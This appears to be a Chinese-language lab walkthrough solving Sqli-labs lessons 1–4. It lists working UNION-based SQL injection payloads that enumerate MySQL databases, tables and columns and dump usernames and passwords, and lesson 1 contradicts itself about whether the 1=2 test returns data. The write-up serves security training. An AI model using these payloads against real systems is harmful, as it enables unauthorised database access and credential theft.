前言
关于Sqli-labs靶场的搭建见Sqli-labs靶场的搭建,这篇文章只做解题。
一、less-1
1.判断是否具有SQL注入的条件。
在搜索框后面输入?id=1 and 1=1-- - //发现是有数据的
在搜索框后面输入?id=1 and 1=2-- - //发现还是有数据的
说明回显有问题,然后我们再来试试?id=1’ and 1=1 (注意1后面的单引号是英文的单引号。)
在搜索框后面输入?id=1’ and 1=1-- - //发现是有数据的
在搜索框后面输入?id=1’ and 1=2-- - //发现还是有数据的
可以看出当1=1时能够正常执行SQL查询
可以看出当1=2时,不能够正常执行SQL查询,说明:此处存在SQL注入漏洞!!!
这里感觉这样试来试去很麻烦,我就想着一步到位,直接在搜索框后面输入:?id=1
大家可以看到下方的报错提示,\ 后面的符号就是’,所以这里的注入点是?id=1’ ,所以我们在搜索框后面直接输入?id=1’
2.大概判断数据所在的表有几列。
运用二分法,我们首先输入?id=1’ order by 10-- - 发现是没有数据的。
然后再次输入?id=1’ order by 5-- - 发现还是没有数据。
然后再次输入?id=1’ order by 4-- - 发现还是没有数据。
然后再次输入?id=1’ order by 3-- - 发现有数据!! 说明数据所在的表的列就为3列。
3.查询所属数据库的版本。
然后查询哪些字段可以显示,注意这里的是?id=-1’ ,可以看出2,3是显示在屏幕上的。
然后我们查询它的数据库版本号:我们查询它数据库的版本号的目的是,在mysql5.0以上版本,具有 information_schema库,这个库有我们想要的数据,而在mysql5.0以下,是没有这个库的。
这里我们可以看到mysql版本为5.7,说明是有information_schema库的。
所以我们就可以查询所属的数据库版本及库名:
?id=-1’ union select 1,2,version()-- -
4.查询所属数据库的库名。
?id=-1’ union select 1,2,database()-- -
5.查询所属库的表名。
通过上面我们可以看出,数据库为security,然后我们查询这个数据库下面的所有表
?id=-1’ union select 1,2,group_concat(TABLE_NAME) from information_schema.TABLES where TABLES.TABLE_SCHEMA=‘security’-- -
6.查询表的列。
通过上面得出,我们已经查出了四张表,我们分析感觉关键的数据在users表里,然后我们查询users表的列:
?id=-1’ union select 1,2,group_concat(COLUMN_NAME) from information_schema.COLUMNS where COLUMNS.TABLE_SCHEMA=‘security’ AND COLUMNS.TABLE_NAME=‘users’ – -
7.爆出关键数据。
由上面得知,表的列有username、password,这些都是我们想要的数据:
?id=-1’ union select 1,2,group_concat(username,password) from users – -
但是这样的话我们不是到哪些是用户名,哪些是密码,然后我们修改一下命令:
?id=-1’ union select 1,username,password from users where id =1 – -
随着id=1,2,3,4,5,…用户名和密码都会显现出来。
二、less-2
1.判断是否具有SQL注入的条件。
我们可以直接在搜索框后面输入?id=1\,看看报错信息,发现 \ 后面是没有符号的。
然后我们可以布尔表达式验证,发现1=2时为假,这时是没有数据的,说明存在SQL注入漏洞。
2.大概判断数据所在的表有几列。
这里判断表有三列,因为order by 4 的时候就不存在了
3. 查询所用数据库的版本号。
然后查询哪些字段可以显示,注意这里的是?id=-1,可以看出2,3是显示在屏幕上的。
然后我们查询它的数据库版本号:我们查询它数据库的版本号的目的是,在mysql5.0以上版本,具有 information_schema库,这个库有我们想要的数据,而在mysql5.0以下,是没有这个库的。
这里我们可以看到mysql版本为5.7,说明是有information_schema库的。
4.查询所属数据库的库名。
然后我们再次查询数据库的库名:
5.查询所属库的表名。
我们得到了数据库的库名,然后我们再次查询数据库的表名:
?id=-1 union select 1,2,group_concat(TABLE_NAME) from information_schema.TABLES where TABLES.TABLE_SCHEMA=‘security’-- -
6.查询表的列。
得到了表名之后,我感觉我们要的用户名和密码数据在users表里。然后我们查询users表的字段。
?id=-1 union select 1,2,group_concat(COLUMN_NAME) from information_schema.COLUMNS where COLUMNS.TABLE_SCHEMA=‘security’ AND COLUMNS.TABLE_NAME=‘users’ – -
7.爆出关键数据。
我们得出了users表的字段,发现是有用户名和密码的,然后我们就要爆出关键的数据:
?id=-1 union select 1,username,password from users where id=1-- -
这里我们随着id的增长,所获得的用户名和密码也不一样。
三、less-3
1.判断是否具有SQL注入的条件。
2.大概判断数据所在的表有几列。
这里我们判断是有3列数据。
3. 查询所用数据库的版本号。
这里我们可以看到数据库的版本为5.7
4.查询所属数据库的库名。
?id=-1’) union select 1,2,database()-- -
5.查询所属库的表名。
?id=-1’) union select 1,2,group_concat(TABLE_NAME) from information_schema.TABLES where TABLES.TABLE_SCHEMA=‘security’-- -
6.查询表的列。
?id=-1’) union select 1,2,group_concat(COLUMN_NAME) from information_schema.COLUMNS where COLUMNS.TABLE_SCHEMA=‘security’ AND COLUMNS.TABLE_NAME=‘users’ – -
7.爆出关键数据。
?id=-1’) union select 1,username,password from users where id=1-- -
或者:
?id=-1’) union select 1,2,group_concat(username,password) from users – -
四、less-4
1.判断是否具有SQL注入的条件。
2.大概判断数据所在的表有几列。
?id=1") order by 3-- -
?id=1") order by 4-- -
这里看出表的数据有3列。
3. 查询所用数据库的版本号。
?id=-1") union select 1,2,version()-- -
4.查询所属数据库的库名。
?id=-1") union select 1,2,database()-- -
5.查询所属库的表名。
?id=-1") union select 1,2,group_concat(TABLE_NAME) from information_schema.TABLES where TABLES.TABLE_SCHEMA=‘security’-- -
6.查询表的列。
?id=-1") union select 1,2,group_concat(COLUMN_NAME) from information_schema.COLUMNS where COLUMNS.TABLE_SCHEMA=‘security’ AND COLUMNS.TABLE_NAME=‘users’ – -
7.爆出关键数据。
?id=-1") union select 1,username,password from users where id=1-- -
或者:
?id=-1") union select 1,2,group_concat(username,password) from users – -